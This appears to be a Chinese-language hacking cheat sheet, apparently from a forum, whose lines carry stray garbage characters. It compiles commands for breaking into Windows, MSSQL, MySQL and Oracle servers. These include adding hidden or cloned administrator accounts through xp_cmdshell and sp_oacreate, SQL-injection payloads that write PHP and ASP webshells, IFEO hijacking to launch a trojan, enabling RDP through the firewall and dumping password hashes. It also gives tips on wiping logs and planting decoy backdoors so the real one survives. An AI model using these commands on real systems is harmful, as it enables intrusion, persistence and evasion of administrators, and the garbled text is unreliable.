4 U. |, ^+ `+ ]1.net user administrator /passwordreq:no8 s$ i" F# x9 i2 p$ B& X
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
4 i+ Z5 k& ^% \8 M2.比较巧妙的建克隆号的步骤
( j& s4 ? {, U' X5 U; M先建一个user的用户2 E/ R) r$ U g
然后导出注册表。然后在计算机管理里删掉
4 k$ `% C7 O; F在导入,在添加为管理员组6 @! a* h% j) k6 ]
3.查radmin密码
) E- v+ v; p+ h8 S3 L) Greg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
! ]+ i! W! ]- f5 D5 J R; s4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]/ N- } q, n3 x) o8 H: A
建立一个"services.exe"的项5 v2 z B M2 B
再在其下面建立(字符串值)+ l/ N1 o- N4 c' R" l6 b& n
键值为mu ma的全路径
2 l( u. T2 ]4 v w9 ?5.runas /user:guest cmd. G0 s' X! y9 f+ `3 Z7 H: z9 ^
测试用户权限!/ o* F9 P7 j; U% e, w% c6 K& ]
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?) o, X5 S9 e' |$ P
7.入侵后漏洞修补、痕迹清理,后门置放:. W9 R x. M+ B: _2 l! a
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门- t% R' G1 s" D2 I* p. D
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c6 N: q& w2 U7 j* \2 _( F# o
3 q7 d. b" A c7 X9 efor example0 L+ T2 S S% J' E7 d
" Y( u" \& E6 `* A
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'; t" c" a$ b9 ]) u3 \$ }
6 R- g2 o5 E, H
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'& }; O7 h& O4 I6 m, d4 m3 [
2 B5 |7 t1 f( |3 z9:MSSQL SERVER 2005默认把xpcmdshell 给ON了2 a. E0 V1 ]0 K1 P9 b
如果要启用的话就必须把他加到高级用户模式
2 J1 J3 H& ?" k; n" _3 x" v可以直接在注入点那里直接注入' G6 V% D8 ^! c: S- P0 W
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
! R* T9 ?) O/ }* h然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
% [7 R% _9 s' Z* h7 t" O [或者
' s Q/ b% b8 x9 t& _sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
: I4 }. ?) B$ P: b来恢复cmdshell。
" v( Y+ e. E/ n `* k- w, _* i6 h6 v
! S* @' O( L! e6 J0 U4 j7 b分析器# ~% Z. ^, s1 Q8 C6 O: x; S
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
& k! w" d+ |/ m然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
7 b+ Q8 T/ y, d E6 G: M10.xp_cmdshell新的恢复办法7 n1 y' \! R9 P* M
xp_cmdshell新的恢复办法* G1 i+ y2 b$ r1 W7 K
扩展储存过程被删除以后可以有很简单的办法恢复:$ c L3 e6 y1 V) `4 ?1 y
删除7 ^; k$ U9 l2 Q, X
drop procedure sp_addextendedproc
' `- J3 _8 {. ^3 K5 `drop procedure sp_oacreate% p+ w% l% E6 e. y
exec sp_dropextendedproc 'xp_cmdshell'
( K8 k2 ^4 {) V' Q. X ~
1 [' N5 g+ n: i5 S恢复6 V4 ?6 f) ^0 q# q! g: t
dbcc addextendedproc ("sp_oacreate","odsole70.dll") T3 r% B, X. q6 g S2 j; }/ }
dbcc addextendedproc ("xp_cmdshell","xplog70.dll"): D. N3 p- Q" w5 M
- N! p' l& G0 r这样可以直接恢复,不用去管sp_addextendedproc是不是存在
* x) M2 W( A6 m4 A' _2 P7 {3 Z3 ^' ~+ p
-----------------------------
W- h2 }+ f5 K) ~1 a; K' M1 u3 a6 W0 G
删除扩展存储过过程xp_cmdshell的语句:9 T# I5 T# x: |, i% I2 k" n
exec sp_dropextendedproc 'xp_cmdshell'
0 M) D+ V, R! w% }: j. f! Q w& j; f) q+ j$ k n
恢复cmdshell的sql语句
" P4 |. i3 w3 Y R0 |1 q3 ^exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
) D! ^2 p+ u. |# |
: g" G1 D; n( T$ H$ h+ g- y5 l' H+ T" D1 d: i
开启cmdshell的sql语句0 t( c' h+ E( V5 W
1 h( H y( e5 Q, m6 A
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'# G' v5 C, `: y2 a. [
8 d7 n) A3 c9 O- K" c- y8 L判断存储扩展是否存在: F6 A, _8 a9 X# Z% G' L" U: G$ C
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
4 H- x) a6 G2 Q+ y- X5 F返回结果为1就ok, {3 ^6 u$ k) w; `
" ~3 g6 ?' z) i; I0 [6 q+ b3 G7 F; {
恢复xp_cmdshell3 u9 a( s( _5 U8 W) S
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell') g- n6 u/ p+ ?9 o
返回结果为1就ok8 z9 W' Z8 p3 w) a' i
& D. B+ u! p4 e( _
否则上传xplog7.0.dll
& S( B, X4 @, [4 aexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'8 ?) U$ P3 ~6 n7 K
7 H8 g! T; X- s+ Z堵上cmdshell的sql语句
) k/ z( C: J7 U( M( Tsp_dropextendedproc "xp_cmdshel
5 ^# K" p3 d. {-------------------------* l, o) \# a* m6 n G5 K. K5 {1 E
清除3389的登录记录用一条系统自带的命令:
7 C- G! i5 a. O" R& Creg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
1 U# }8 b. H. c. o) k+ `
- [ G' F4 y2 } I) A' z [/ V然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件: ~; b ~. J5 C) r. g5 t
在 mysql里查看当前用户的权限8 e- X5 f& M$ t" H
show grants for % Z8 I5 \1 W5 w" F7 u/ V
7 U; T* t% `$ Z" v以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。6 I k: b/ ]' D: `% v: [
0 N' |! V. `% J9 u, Z2 j
w: T" F. D5 u8 Q6 ~% v
Create USER 'itpro'@'%' IDENTIFIED BY '123';$ s- @5 M6 h8 q: m& |
5 L8 d0 k: l1 [* F0 T% i6 vGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
. V, }9 e o+ Y F5 w" B2 Q
1 m7 G7 F7 r# `MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
7 v; e, N' e" g& z; M
$ } F/ Q+ g3 \MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
2 N8 r: u3 T' |1 i& [1 P2 F9 D; u
搞完事记得删除脚印哟。3 q; j; b# W& g
9 b7 ^ F! w e- x' p6 lDrop USER 'itpro'@'%';* _) v" b8 |$ V6 G+ g
, Z) }) C$ g$ A* \. ^( ]& O
Drop DATABASE IF EXISTS `itpro` ;+ I+ j5 K& _& I
: f$ C" C* K" x4 n2 A% ~- G- k; b1 R当前用户获取system权限/ Y' A' N) ]: m
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact' O( [" \, M8 f' T- H5 b+ g5 _
sc start SuperCMD
. n% z" {4 l# C* N, T+ M2 B程序代码
! X! e2 {) h- {<SCRIPT LANGUAGE="VBScript">
3 [5 X5 T: D, Q, E+ ^set wsnetwork=CreateObject("WSCRIPT.NETWORK")
2 H. t; p% h* X% j t$ W1 ~7 X$ Fos="WinNT://"&wsnetwork.ComputerName! q' ` u3 S3 a9 U0 S9 @
Set ob=GetObject(os)
2 X1 i' H( J; O8 f1 t9 ?Set oe=GetObject(os&"/Administrators,group"); }: W# i0 U. y6 Z8 `% O% X
Set od=ob.Create("user","nosec")6 b! q5 T" o, o5 s* \" k3 c
od.SetPassword "123456abc!@#"7 J6 y4 K. C: g9 u8 s6 |
od.SetInfo" B# `7 W$ O$ y' j$ e Y# }' ]) t$ F
Set of=GetObject(os&"/nosec",user), F" J5 o2 y- N4 A
oe.add os&"/nosec"; V) w3 Z, q! i3 y# M! K, I
</Script>
/ T! Z- {5 t2 s7 t+ n<script language=javascript>window.close();</script>% R8 r6 S2 A! t0 ]5 }6 O& e
: e1 {5 V4 V, t4 W" g3 f1 M) P# I
% @) [0 e) j8 S8 ^3 C! u' m# `( `6 w. H" S% R2 w, X
0 O# N0 K5 h2 r( Y突破验证码限制入后台拿shell8 L1 }7 o, C: u2 a6 q
程序代码
/ C, N3 M: `. W# B, ?REGEDIT4
( z! s3 k! I2 K# C7 p' m% q8 i[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
A0 r3 [3 @, u6 S"BlockXBM"=dword:00000000
0 k, A- ~( X7 U+ q9 a# r/ @0 s/ e k. q- _8 I4 h1 `4 ?# ~
保存为code.reg,导入注册表,重器IE, ^5 e+ v3 M/ C" ?9 x
就可以了) e' H: ]3 ^9 O( q4 _; j" t
union写马+ o: ?: k W1 A. y( ?
程序代码
0 s2 g' s! p. f* x, r- N5 P( rwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
' R8 b9 S8 n8 M6 C8 v2 A/ Y7 E
5 f4 m- G4 p8 O) d& y" q% Y应用在dedecms注射漏洞上,无后台写马
; w2 u8 z P0 l2 b! Sdedecms后台,无文件管理器,没有outfile权限的时候- z! U5 r" ?2 Z* ]6 |5 p3 p, D, u
在插件管理-病毒扫描里
$ X) Y6 A; I H+ k2 J4 o写一句话进include/config_hand.php里
8 Z* `" J3 y8 D- B0 b: d4 x程序代码. a1 _' U4 D U" f% H) e" \
>';?><?php @eval($_POST[cmd]);?>
5 y8 I& ^; D) p$ I e4 o6 m/ u: N% @0 ^+ l
& z% \7 H9 d m8 v: R. N6 m9 i如上格式; d' i6 A1 M6 A" z
8 ]- i6 Y: U d0 w- I! ~+ X) goracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解' M! M& j3 a0 ^2 Y- s
程序代码' k v- z9 n9 n( ]9 t" l
select username,password from dba_users;
+ j% y/ g% X8 V
5 J4 t9 ]& u) c: W. {: }- @
# A- z4 O- N# L; Pmysql远程连接用户1 ?) N! p7 f1 G2 p1 t: L1 C
程序代码
% x4 m) }- |+ i {* }2 [8 Y8 P+ u' e! J. Q9 S5 B
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';& W1 s" i* s# B) F- a$ W; d
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION( w) B( o4 d4 ~- m, }: `
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0! J9 B' m6 A2 [6 m7 Y. }* d9 a+ M
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
! c1 f3 h& S+ c9 `8 l$ Y
( O. b, s0 j( s/ P) z
8 L; S- D% J4 Q' P, g6 k( E6 U y* q- s- ~$ x9 U) H" z4 C; P
- Z, ?% r& J f1 r! eecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 07 ^ i% q% Z2 K6 B# M* a' M
/ N$ r) h. J, h m% N' |8 R
1.查询终端端口
. v! s+ ?0 Y7 Q7 L2 B/ Z4 @; W; G* p) b7 F! \: M
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
& p* p* ^' R6 m4 c
5 t" z+ F3 C- X, n- v( D通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
7 S) Y/ ^$ Z I+ G: U, y8 m7 utype tsp.reg
$ U! Y5 I9 ]9 x+ T% k4 Y3 W! i% o! W: u Y9 {6 y9 b/ F
2.开启XP&2003终端服务
5 ~0 l( D6 p7 s3 W2 k& _! N6 P; v+ ^, C* w2 F K, ^# d6 n/ `
) S7 Q: z `3 |5 m4 c% QREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
/ K$ ^5 |& e- j; D4 ~' w4 Q' m# w- L2 ~* \ ~ z
5 [! z+ x( Z5 J9 fREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f- ~2 z2 n% a( y1 A ?- h2 C( U. `
1 K8 f9 X3 g* w% |9 \9 P: m/ e; T3.更改终端端口为20008(0x4E28): {+ l! w1 ~* `6 u1 q. v1 ~
# H l3 r( B0 j6 A! r; ~
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
) x+ h( v, y( \2 G. g9 c5 u6 t4 b6 J& O
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f* @( { v" o3 a8 ~# X2 S! \
7 ]1 p; n7 c; h9 z$ s u; E* m
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制8 | H- |5 z1 J; f0 v c: h5 t" ^
+ L- A b2 K& a- ~( JREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f- q O% i) U0 H/ U* z. |: I
{7 s- Y, B+ w8 C
+ z2 P; D. |* Y- M- K8 _5.开启Win2000的终端,端口为3389(需重启)& H. M) n0 A- R; @2 i
0 i. J7 }6 r4 ?0 o1 H+ K8 ^, Cecho Windows Registry Editor Version 5.00 >2000.reg , M) c, A' m+ E/ y
echo. >>2000.reg
% x" v A" O c9 D0 gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 7 E9 q/ H1 _! B* {! n! E4 ~
echo "Enabled"="0" >>2000.reg : y7 z0 i/ W1 y. V" x0 {
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
3 A7 ~4 @5 ?6 W+ g' h6 G; qecho "ShutdownWithoutLogon"="0" >>2000.reg 8 e. U* |, J- e+ h
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg . N% T2 t( N7 d/ g
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
/ U4 H$ p. C v& kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg . n2 n- j `. n' ?" _
echo "TSEnabled"=dword:00000001 >>2000.reg
' z# H: p* v n) yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
/ j! F5 r! P0 r: d2 F/ x+ T- U: x: yecho "Start"=dword:00000002 >>2000.reg + Z% {) u1 W# a8 ?' a' s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 3 ^& h& M# |! m. d% _
echo "Start"=dword:00000002 >>2000.reg # T# V) ?9 Y1 |0 [" j* [
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg + \4 N0 m% z& ?: f. Q
echo "Hotkey"="1" >>2000.reg 7 v9 O9 Q* }, V5 q; S8 P# J2 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 9 t3 \0 a% N. A5 K, M
echo "ortNumber"=dword:00000D3D >>2000.reg / C7 q+ F; z( {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg & ^. N" o) n2 A4 d
echo "ortNumber"=dword:00000D3D >>2000.reg+ }3 i9 G8 e, d. L
9 N0 h& S* `7 f1 e
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)+ e1 q2 R" T5 Z; m
9 H$ N% j. g3 F S" C) Y7 m w) K
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
! z4 K& u$ }& V$ T5 F) u) ^(set inf=InstallHinfSection DefaultInstall)
+ \( j- |- G; T1 S, hecho signature=$chicago$ >> restart.inf0 Y4 j6 l4 X n; {/ `8 ^2 f
echo [defaultinstall] >> restart.inf
B+ g1 L% N( j3 Y% {4 U( irundll32 setupapi,%inf% 1 %temp%\restart.inf4 q4 U: E- i6 G2 L
* d( g5 V9 H1 c" Q4 A) }
! f; f0 k# Q+ V: n7 \% p: M$ Z" ?" r
7.禁用TCP/IP端口筛选 (需重启)' @+ P, n# F4 U$ d
6 D! {& F1 \" c% _. _$ {1 @
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f" G0 P: r% U' f/ f" a5 {0 M) {
9 X% t9 D: t7 N H- c0 m: E8.终端超出最大连接数时可用下面的命令来连接, L9 k: h* i% F5 A3 r0 Z8 v7 I
4 ^5 R- Y' B9 ]# ?1 f. t9 p% hmstsc /v:ip:3389 /console
- U) z+ w+ z' J: ~) T) h+ V) { G( l, H+ t7 d% h" w
9.调整NTFS分区权限4 u I1 L$ \8 b9 [5 B
+ z6 A, C) V1 c
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)6 v6 H! s# N0 q7 d
- R) |0 e5 b( f! b3 n9 E
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件), c. G% ]2 V5 e3 ?; G) n- Q
) W2 B& n& {0 y O------------------------------------------------------: m' N- i1 y% U
3389.vbs
+ V; G1 ^9 f) x# dOn Error Resume Next
5 G9 p, s4 A- v, ]; x Econst HKEY_LOCAL_MACHINE = &H80000002) n4 g. G1 ~" h; L' [* ^
strComputer = "."
( A! V$ U! R9 O. P; U# tSet StdOut = WScript.StdOut
( U1 B1 v/ c5 @/ a/ J: fSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_3 x1 p0 i; r- `" {9 N
strComputer & "\root\default:StdRegProv")% y6 \" n3 C; F8 D2 @1 o6 _ W) l7 f
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"0 s8 I1 X; ^7 d5 J! u1 f1 a/ u6 r
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath( c6 k4 V2 L( e9 |0 D6 T" Z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"8 @3 f1 P7 S! D4 b D
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
9 n, I, F. U* r3 ?+ HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"! L3 w/ V; c/ |& e \' U' ~+ L
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
8 R z" T3 X5 D+ j& istrValueName = "fDenyTSConnections"
2 u6 f, ]2 A7 C4 cdwValue = 0
0 I* W8 l( R% Voreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
3 ^0 k. f) c( W7 y/ KstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
/ m% H$ b, V5 q9 }$ nstrValueName = "ortNumber"
2 [: H u7 \7 K+ X4 Y- ?dwValue = 3389
9 {/ M+ ?; Y; D% r5 [) N8 X/ n$ xoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue. z- F4 U2 G+ }( D
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"/ ~( z; d4 {" T P/ I$ a
strValueName = "ortNumber"
9 l+ y: J5 q+ S) SdwValue = 3389" E: N5 J! \1 w+ K4 ~4 o* u
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue; _2 f' p+ M# ], u/ k
Set R = CreateObject("WScript.Shell")
# m5 b$ D2 }8 i2 BR.run("Shutdown.exe -f -r -t 0")
- `5 H8 k% R8 N; Z6 q F/ b5 w/ c9 g- |6 {/ {- }
删除awgina.dll的注册表键值& R4 c7 M2 t/ J: h7 B% k. v
程序代码
- }* B/ P& L" Z0 Q( _
5 Q7 {9 h/ d! |) ^# yreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f- ]# Q, y% S* z* O- F; A
. u$ b8 v0 R- ~% x3 y( u& S9 z$ ~
. v- K+ y$ |- g/ Z2 y6 g
) I( }# {8 u' T/ p8 A) |0 A1 @" N2 y, O& _8 S
程序代码. a/ k( J8 [( M1 h9 b1 \. y
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
1 t$ \( U% f8 o$ q) Y3 `' ]
- X% S6 \4 R& b0 x设置为1,关闭LM Hash
. d, [' W- X9 Y/ e
8 u& ?. x: g) @0 q/ T; v9 y数据库安全:入侵Oracle数据库常用操作命令
+ r! w' i+ }: s" ]- {7 p最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。5 I' F, p( x/ S6 o3 J: e0 r
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。3 ^ p" z3 M ^
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
3 A l; _0 }+ {. l0 Q& A3、SQL>connect / as sysdba ;(as sysoper)或
8 }% J0 c8 q, O2 o+ |0 P `& Dconnect internal/oracle AS SYSDBA ;(scott/tiger)
3 J- }: O9 o1 Q9 _0 s$ ~& B2 H/ ~conn sys/change_on_install as sysdba;
' B( ?( V( K0 ?3 r) v) z, V2 g4、SQL>startup; 启动数据库实例- \$ c8 B4 `, j- g' ?$ ^1 E
5、查看当前的所有数据库: select * from v$database;- ~+ Y, I* o( T0 |: m+ [2 l! n
select name from v$database;
4 U/ D) r7 D' |+ G6、desc v$databases; 查看数据库结构字段
: T# Z4 b& k+ z' S2 G. Y0 G/ T7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:4 j2 p0 R8 P+ I6 u6 `
SQL>select * from V_$PWFILE_USERS;
: v) j/ s3 k+ x( _: ?: nShow user;查看当前数据库连接用户" h( K% [- X+ f7 X# X
8、进入test数据库:database test;
; Z/ l/ h2 x& Z. M* Q9、查看所有的数据库实例:select * from v$instance;
( A- o5 r: r$ z3 ~* _" }& b如:ora9i* E1 e. C; k; }' D9 U2 n6 T* D
10、查看当前库的所有数据表:7 s" g8 W, B( k S7 s
SQL> select TABLE_NAME from all_tables;" `, h8 e8 L/ f
select * from all_tables;
# y/ {7 o f! ]7 n* Y4 eSQL> select table_name from all_tables where table_name like '%u%';2 Z( v) G* u8 [' x, Y3 N
TABLE_NAME
) A* z1 c5 R* x0 w------------------------------8 h4 r+ ~7 d" z
_default_auditing_options_
& U4 @$ z% W/ E& ?$ k11、查看表结构:desc all_tables;
. M" _; b+ V5 h1 ?. E5 ?12、显示CQI.T_BBS_XUSER的所有字段结构:: O5 c9 I6 L+ U& D( z5 O
desc CQI.T_BBS_XUSER;
; p r# W7 B" c6 F/ b+ I( l: C13、获得CQI.T_BBS_XUSER表中的记录:. i+ e/ g/ V% H8 e1 u, {3 S0 W
select * from CQI.T_BBS_XUSER;
y6 F0 d6 ~7 o) a0 U/ I+ {8 M) j# N14、增加数据库用户:(test11/test)
9 h: L) o7 r; bcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;, u8 S( r R: h+ g5 D
15、用户授权:
9 Y% y8 W* e0 G* N4 s8 tgrant connect,resource,dba to test11;) t( u( I. G4 c- X
grant sysdba to test11;) }' A' a1 S9 _5 w _8 i: k5 l N9 R
commit;
' u2 {& Z- t! V1 k' S. z V16、更改数据库用户的密码:(将sys与system的密码改为test.)! r( L' N- q9 e2 w' E5 Q
alter user sys indentified by test;
* z$ ]# o) \5 [5 [% W6 Oalter user system indentified by test;
; R+ Q$ c5 L& x3 f
6 e; N4 c" e& [3 o, J. wapplicationContext-util.xml* P6 G' @6 w7 p' f$ ^; a
applicationContext.xml
' f7 ?7 E! T6 G5 ?struts-config.xml
9 Z: f0 X4 r0 y. i& y, `web.xml
: f9 K5 C0 _" y+ _" Y% t kserver.xml7 Z7 e/ G1 q: O0 @$ k
tomcat-users.xml/ t9 u) A9 f# P* d9 s
hibernate.cfg.xml; ?8 X5 R! u6 C
database_pool_config.xml: m, \+ y$ y# Z* Q$ q" X! r
8 j( I; U$ o" E& Q. k3 a, r& `# W2 ^4 }$ ~6 A" O+ E8 k( I
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置( g- E% {4 R1 a
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini% v3 C* [1 t" e. w9 m# s# @. U
\WEB-INF\struts-config.xml 文件目录结构" }" A1 ~7 L( g, {
% |8 ^- _' J7 X9 U% _
spring.properties 里边包含hibernate.cfg.xml的名称
( |; D k- E4 q1 |3 V4 J+ x$ v
5 A2 R# L1 d/ R; K4 s2 S" o4 q( s* h8 K- G4 ?1 o1 U" U
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml2 {8 r3 V% j# }& m6 ^
- `0 E' \2 w" \: D) S
如果都找不到 那就看看class文件吧。。
- N% {: B; V) Y3 P
& `8 H& ~& M; W测试1:
0 `. H8 E+ }8 U) {; \ H6 ]5 l; eSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t15 A' D+ J; U8 @
( V" P2 |" N+ u" X' h
测试2:
/ Y3 B0 A0 i; f, z/ b% D$ V" N F' T2 M" s; o$ |
create table dirs(paths varchar(100),paths1 varchar(100), id int)
2 ?& R. g; F% n: A
7 I0 b6 C! p' M: mdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--: g+ C1 d ~* m% k
1 u0 ^( N% C3 B$ N/ |3 e- lSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
' Z7 ~( t! x" ^( e9 _3 H/ H8 ~9 f8 E( N4 n7 \; c* ~ Q( d
查看虚拟机中的共享文件:* p6 i; E0 L7 }" P/ ~
在虚拟机中的cmd中执行, A9 m2 V1 M( d. R2 l2 s( Y* z
\\.host\Shared Folders
( P- @ a: a) O: h1 j% E: q6 [3 k3 X- p$ K% \0 l8 L
cmdshell下找终端的技巧
$ l+ z3 Y# N8 E. G/ w' ~2 F找终端: 7 {5 R2 E' Y% J
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! . {/ s4 Z* W: r; A: \* N2 K
而终端所对应的服务名为:TermService
' O) ~. r' ]& R8 O0 X7 B第二步:用netstat -ano命令,列出所有端口对应的PID值! & i! v6 l6 j; A% N- Y/ Y" I- {
找到PID值所对应的端口
3 D1 Z, i5 N1 E4 d$ L) ]7 [2 g. \% L; E+ J7 k2 H6 U! P6 H
查询sql server 2005中的密码hash. K; t) c/ L! Z) _- O1 x6 [8 @2 b
SELECT password_hash FROM sys.sql_logins where name='sa'
5 ~% _; B9 A( l: \$ RSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
- Y8 |1 k: f- }; i3 O0 _6 eaccess中导出shell
" G$ K r0 |1 r1 v: E) h- R! I% l$ M" J; W5 V# {2 ^; @4 P
中文版本操作系统中针对mysql添加用户完整代码:
5 F+ t* A: `" f1 E+ f% |/ t k* K0 m o- A
